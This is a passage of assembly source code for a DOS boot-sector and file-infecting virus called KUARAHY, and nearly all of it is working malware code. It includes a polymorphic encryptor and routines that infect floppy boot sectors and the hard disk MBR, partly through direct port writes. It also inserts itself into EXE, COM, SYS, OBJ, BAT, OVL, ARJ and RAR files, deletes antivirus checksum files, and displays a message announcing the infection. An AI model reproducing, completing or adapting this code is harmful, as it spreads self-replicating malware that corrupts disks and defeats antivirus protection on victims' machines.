add si,cx
jmp Oikoma
UsarDI: mov al,0bfh ; DI
mov di,offset ClaveB+2
mov ax,04747h
mov di,offset ClaveB-1
mov si,offset TablaDI-1
add si,cx
Oikoma: xor si,si ; Write the new 1§ decryptor over
mov di,offset CopiaVirus ; the buffer
mov cx,offset Encriptado
rep movsb
mov si,offset CopiaVirus
add si,offset Encriptado
mov ax,word ptr [ClaveB]
mov cx,0d8h
Rotar: xor word ptr [si],ax ; Encrypt first part (BS/MBR one)
inc si
inc si
loop Rotar
cmp byte ptr cs:[QueEs],'b' ; Flag checking
jne Voltemos
mov si,offset CopiaVirus
add si,offset Pointer ; Fix the pointer for BS/MBR copy
mov word ptr [si],offset Encriptado+07c00h
mov si,offset Cabecera
or word ptr [si],02020h ; Lowercase extension
or word ptr [si+2],020h
mov di,offset Targets ; And check if it matchs with one
Otro: mov si,offset Cabecera ; of the 8 we can manage
cmp di,offset Targets+24
ja Ninguno
mov cx,3
rep cmpsb
jnz Otro
cmp di,offset Targets+3
je Exe
cmp di, offset Targets+6
je Com
cmp di,offset Targets+9
je Sys
cmp di,offset Targets+12
je Obj
cmp di,offset Targets+15
je Bat
cmp di,offset Targets+18
je Ovl
cmp di,offset Targets+21
je Arj
cmp di,offset Targets+24
je Rar
Ninguno:mov byte ptr [QueEs],'X' ; :(
Exe: mov al,'E' ; EXE
jmp EternoRetorno
Com: mov al,'C' ; COM
jmp EternoRetorno
Sys: mov al,'S' ; SYS
jmp EternoRetorno
Obj: mov al,'O' ; OBJ
jmp EternoRetorno
Bat: mov al,'B' ; BAT
jmp EternoRetorno
Ovl: mov al,'E' ; OVL
jmp EternoRetorno
Arj: mov al,'A' ; ARJ
jmp EternoRetorno
Rar: mov al,'R' ; RAR
mov byte ptr [QueEs],al
mov ds,bx
Lectura:mov ah,3fh ; Read OBJ field descriptor
mov cx,3
mov dx,offset Buffer
int 21h
mov dx,word ptr ds:[Buffer+1]
mov al,byte ptr ds:[Buffer]
CRC32: push bx cx si di
call Generar_Tabla ; Generate CRC 32 table
mov dx,0ffffh
mov ax,0ffffh
sub bx,bx
mov bl,byte ptr [si]
inc si
xor bl,al
shl bx,1
shl bx,1
mov al,ah
mov ah,dl
mov dl,dh
xor dh,dh
xor ax,word ptr [bx+offset ParaCRC]
xor dx,word ptr [bx+offset ParaCRC+2]
dec cx
jnz CRC32loop
xor dx,0ffffh
xor ax,0ffffh
pop di si cx bx
Chequeo:mov ax,013cdh ; Yes, we are TSR
mov bx,cs
Generar_Tabla: ; Generates the CRC 32 table
push ax cx dx di
mov di,offset ParaCRC ; Buffer where the table will be
xor cx,cx ; created
xor dx,dx
xor ax,ax
mov al,cl
push cx
mov cx,8
rcr dx,1
rcr ax,1
jnc NoXORear
xor dx,0edb8h
xor ax,8320h
loop Calculo
mov word ptr [di],ax
mov word ptr [di+2],dx
add di,4
pop cx
inc cx
cmp cx,100h
jne Carrusell
pop di dx cx ax
push ds si ax bx
pop ax
and ah,11111110b ; Turn off the trap flag
push ax
sub ax,ax
mov ds,ax
mov bx,4
lds si,[bx]
mov byte ptr [si],0cfh ; Put an IRET in the INT 1 handler
pop bx ax si ds
Infectar: ; Floppy infection routine
call dword ptr cs:[Offset_de_la_13h]
jc Error_de_Lectura
cmp word ptr es:[bx+offset Marca],0f7e2h
je Stealth_BS ; If already infected, stealth it
cmp word ptr es:[bx+13h],0b40h
jne Error_de_Lectura ; FD 1.44mb? 2880 sectors
push ax bx cx dx si di
mov byte ptr cs:[DondeEstamos],'F'
push es
push ds
push es
pop ds
push cs
pop es
lea si,[bx+3] ; Save BPB values of the floppy
mov di,3
mov cx,3bh
rep movsb
pop ds
pop es
call Format_an_extra_track ; Create our new cylinder in A:
mov ax,0301h ; Write original BS to sector 1
sub dx,dx ; Head 0
mov cx,05001h ; Track 80, sector 1
call dword ptr cs:[Offset_de_la_13h]
mov ax,0301h
call dword ptr cs:[Offset_de_la_13h]
push es
push cs
pop es
mov byte ptr cs:[QueEs],'b' ; Modify our flag
push bp ds es
mov bp,020fh
call Encriptor ; Give me an encrypted copy
pop es ds bp
mov ax,0309h ; Write the virus in the contiguos
mov cx,5002h ; sectors of our track 80
mov bx,offset CopiaVirus+200h
call dword ptr cs:[Offset_de_la_13h]
mov ax,0309h
call dword ptr cs:[Offset_de_la_13h]
mov ax,0301h
mov cx,0001h ; Write virus first part to BS
xor dx,dx
mov bx,offset CopiaVirus
call dword ptr cs:[Offset_de_la_13h]
pop es
pop di si dx cx bx ax
retf 2
db 3,'Rohaih£ Paraguay!',3 ; Guaran¡ language r0x0r!!!
Format_an_extra_track: ; The extra track kreator
push ds es bx
push cs cs
pop ds es
xor ax,ax
mov ds,ax ; DS=IVT
mov si,01eh*4
mov di,offset Vieja1eh ; Copy old Int 1eh address (ddpt)
mov es,ax
mov di,01eh*4
mov ax,offset FDHD35 ; Hook Int 1eh, points to our own table
mov ax,cs
push cs cs
pop ds es
mov di,offset Tabla ; Generation of the little table
mov cx,0201h
mov ax,0050h ; 50h=80d, our new track
stosw ; 0 is for the head 0
mov ax,cx ; CH=02, 512 bytes x sector
inc cl ; INC sector counter
cmp cx,020Ah
jbe Fabricar_Tabla
xor ax,ax
int 13h
mov ax,050Ah ; Format 10 sectors
mov bx,offset Tabla
mov cx,05001h ; Track 80, from sector #1
xor dx,dx ; Head 0, drive A:
int 13h
xor ax,ax
mov es,ax
mov si,offset Vieja1eh ; Restore Int 1eh
mov di,1eh*4
pop bx es ds
InfectarMBR: ; MBR infector procedure
push ax bx cx dx si di bp ds es
push cs cs
pop ds es
cmp byte ptr es:[Bandera],'N'
jne Adios ; Already infected in previous ocasion
mov ax,0201h
mov bx,offset MBRBS ; Read MBR
mov cx,1
mov dx,0080h
int 13h
cmp word ptr [bx+offset Marca],0f7e2h
jne SuckIt ; Already infected?
Adios: pop es ds bp di si dx cx bx ax
SuckIt: mov byte ptr es:[DondeEstamos],'H'
mov byte ptr es:[Bandera],'Y'
mov di,32 ; Check my flag
call Reutilizar
jmp short Adios
Direct_HD_Write_Using_Ports: ; MBR infection via HD ports
mov dx,01f2h ; Initial port
mov cx,6 ; We will go 6 times
outsb ; Send the byte to port
inc dx ; Next port
loop $-2 ; Repeat
Esperar:in al,dx
test al,8 ; Wait...
jz Esperar
mov si,bx ; DS:SI=buffer to write
mov cx,256
mov dx,1f0h
repe outsw ; Do it
TablaBX db 037h,02fh,07h ;
TablaSI db 034h,02ch,04h ; Tables used to mutate decryptor
TablaDI db 035h,02dh,05h ;
; Disk device parameter table for our new track
FDHD35 db 0dfh,2,025h,2,012h,01bh,0ffh,06ch,2,0fh,8
; Values that we will send to HD ports
ParaOuting db 1,1,0,0,0a0h,30h
; Stupid files we will delete in order to free space :)
Basura1 db 'ANTI-VIR.DAT',0
Basura2 db 'CHKLIST.MS',0
Basura3 db 'CHKLIST.CPS',0
Basura4 db 'AVP.CRC',0
; This is the parameter table for 4Bh function
PSP dw 0,80h
SLINEA dw 0,005ch
FCB1 dw 0,006ch
FCB2 dw 0
RunMe db 'C:\COMMAND.COM',0
; OBJ ending module
db 08ah,07h,00h,0c1h,010h,01h,01h,00h,01h,09bh
; The OBJ record where the virus will go
db 0a0h
dw Largor+3
db 01
dw 100h
; Insane bitmapped fonts. To change default text mode fonts to a nicer one
Letras db 00000000b
db 00000000b
db 00111000b
db 01111100b
db 11000110b
db 11000110b
db 01101100b
db 11111110b ; A
db 11000110b
db 11000110b
db 11000110b
db 01000100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 11111000b
db 01111100b
db 01100110b
db 01100110b
db 01101110b
db 11111100b ; B
db 01100110b
db 01100110b
db 01111110b
db 11111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00111000b
db 01111100b
db 11100110b
db 01100110b
db 01100010b
db 01100000b ; C
db 01100010b
db 11100110b
db 01111110b
db 00111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 11110000b
db 00111000b
db 00011100b
db 01001110b
db 11100110b
db 01100110b ; D
db 01100110b
db 01100110b
db 01111100b
db 11111000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01111000b
db 11111100b
db 01100110b
db 01101010b
db 11111000b
db 01101000b ; E
db 01100010b
db 01100110b
db 11111100b
db 01111000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01111100b
db 11111110b
db 01100010b
db 01100000b
db 01101000b ; F
db 11111000b
db 01101000b
db 01100000b
db 01100000b
db 11110000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01111100b
db 11101110b
db 01100110b
db 01100100b
db 01100000b ; G
db 11100010b
db 01100110b
db 01101110b
db 11111110b
db 01110110b
db 00000010b
db 00000000b
db 00000000b
db 00000000b
db 01000010b
db 01100110b
db 01100110b
db 01100110b
db 11100111b ; H
db 01111110b
db 01100110b
db 01100110b
db 01100110b
db 01000010b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00011000b
db 00111100b
db 00111100b
db 00011000b
db 00011000b ; I
db 00011000b
db 00011000b
db 00111100b
db 00111100b
db 00011000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00000110b
db 00001110b
db 00001110b
db 01000110b
db 01100110b ; J
db 01110110b
db 01100110b
db 01100110b
db 01100110b
db 00111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00100010b
db 01100110b
db 11100110b
db 01100110b
db 01110100b ; K
db 01111000b
db 01101100b
db 11100110b
db 01100110b
db 00100010b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00100000b
db 01100000b
db 11100000b
db 01100000b
db 01100000b ; L
db 01100010b
db 01100110b
db 01101110b
db 01100110b
db 11111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 10000010b
db 11000010b
db 11000110b
db 11101110b
db 11111110b
db 11010110b ; M
db 11010110b
db 11000110b
db 11000110b
db 01000100b
db 00000000b
db 00000000b
db 00000000b
db 10000010b
db 11000110b
db 11100110b
db 11110110b
db 11011110b ; N
db 11001110b
db 11000110b
db 11000110b
db 11000110b
db 01000010b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00011000b
db 00111100b
db 01101110b
db 01100110b
db 01100110b
db 01100110b ; O
db 01100110b
db 01110110b
db 00111100b
db 00011000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 11110000b
db 01111100b
db 01101110b
db 01100110b
db 01100110b
db 01101110b ; P
db 11111100b
db 01100000b
db 01100000b
db 01000000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00110000b
db 01111100b
db 11000110b
db 11000110b
db 11000110b
db 11000110b ; Q
db 11000110b
db 11010110b
db 01111100b
db 00011000b
db 00001100b
db 00000000b
db 00000000b
db 00000000b
db 11111100b
db 01100110b
db 01100110b
db 01100110b
db 01110100b
db 01111000b ; R
db 01101100b
db 11100110b
db 01100110b
db 00100010b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00111100b
db 01100110b
db 01100110b
db 01100110b
db 00110010b ; S
db 00011000b
db 0001100b
db 00100110b
db 01100110b
db 10111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00100100b
db 01111110b
db 11011011b
db 10011001b
db 00011000b
db 00011000b ; T
db 00011000b
db 00011000b
db 00011000b
db 00111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01000010b
db 01100110b
db 01100110b
db 01100110b
db 01100110b ; U
db 01100110b
db 01100110b
db 01100110b
db 01111110b
db 00111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00100100b
db 01100110b
db 01100110b
db 01100110b
db 01100110b ; V
db 01100110b
db 01100110b
db 01100110b
db 00111100b
db 00011000b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 10000010b
db 11000110b
db 11000110b
db 11000110b
db 11010110b
db 11010110b ; W
db 11111110b
db 11111110b
db 11101110b
db 01000100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01000010b
db 01100110b
db 00111100b
db 00011000b
db 00011000b ; X
db 00011000b
db 00011000b
db 00111100b
db 01100110b
db 01000010b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 01000010b
db 01100110b
db 01100110b
db 00111100b
db 00011000b
db 00011000b ; Y
db 00011000b
db 00011000b
db 00011000b
db 00111100b
db 00000000b
db 00000000b
db 00000000b
db 00000000b
db 00111100b
db 01100110b
db 01000110b
db 00001100b
db 00011000b ; Z
db 01111100b
db 00110000b
db 01100010b
db 01100110b
db 00111100b
db 00000000b
db 00000000b
Buffer db 0,0,0 ; Used by the OBJ infection
Entrada db 0,0,0 ; procedure
Linea db ' /C '
; This is our RAR header
RARHeader: ; Hey Star0!
RARHeaderCRC: dw 0
RARType: db 074h ; File Header
RARFlags: dw 8000h
RARHeadsize: dw HeaderSize
RARCompressed: dd Largor ; Both are the same
RAROriginal: dd Largor ; because we stored it
RAROs: db 0 ; MS-DOS
RARCrc32: dd 0
RARTimeDate db 0deh,045h,022h,025h ; Marked time+date
RARNeedVer: db 014h
RARMethod: db 030h ; Storing method of compression
RARFnameSize: dw EndRARHeader-RARName
RARAttrib: dd 0
RARName: db "FONT.COM"
; We will write this to the ARJ
ARJSig: db 60h,0EAh ; ARJ signature
ARJHeadsiz: dw 28h ; Header size
ARJHSmsize: db 1Eh ; Internal header size
ARJVer: db 07h ; Ver made by
ARJMin: db 01h ; Minimum version to extract
ARJHost: db 0h ; Host OS
ARJFlags: db 10h ; Flags
ARJMethod: db 0h ; Method=stored
ARJFiletype: db 0h ; File type=binary
ARJReserved: db 'Z' ; reserved
TimeDate db 0deh,045h,022h,025h ; Marked time+date
ARJCompress: dd Largor ; size compressed
ARJOriginal: dd Largor ; size uncompressed
ARJCrc32: dd 0 ; CRC of The file
ARJEntryName: dw 0 ; Just God Knows...
ARJAttribute: dw 0 ; Attribute
ARJHostData: dw 0 ; Unknown Mnemonic...
Agregar: db 'FONT.COM',0 ; FileName
ARJComment: db 0 ; Comment
ARJHeaderCrc: dd 0 ; Header Crc32
ARJExtended: dw 0 ; Extended Header
OMEGA: ; End of virus in the file
Stratovarius dw 0 ; Best Melodic Metal Group!!!
AtribsFile dw 0
Vieja24h dd 0
Victima dd 0
SFT dd 0
MBRBS db 512 dup(0)
Cabecera db 45d dup(0)
FileName db 128d dup(0)
CopiaVirus db Largor dup(0)
Vieja1eh dd 0
TABLA db 40 dup(0) ; The table will be generated here
ParaCRC db 1024 dup(0)
FAKEHOSTE: push cs ; Our sucked hoste :)
pop ds
mov ah,9 ; Print the message
mov dx,offset Dreamspace
int 21h
mov ax,4c00h ; Turn back to DOS
int 21h
Dreamspace: ; Excelent Stratovarius's album!
db 13,10,13,10,13,10,13,10
db " Now it's time for you to move on",13,10
db " Leave the shadows of your past",13,10
db " Don't let them haunt you forever",13,10,13,10
db " Hold on to your dream",13,10
db " Somewhere there's a beam of hope",13,10
db " which is guiding your way through the dark",13,10,13,10
db " Hold on to your dream - STRATOVARIUS",13,10,13,10
db " KUARAHY virus released! Your MBR is infected. Embogues kuarahy?",13,10,13,10,'$'
END KUARAHY ; Yes, this is the end...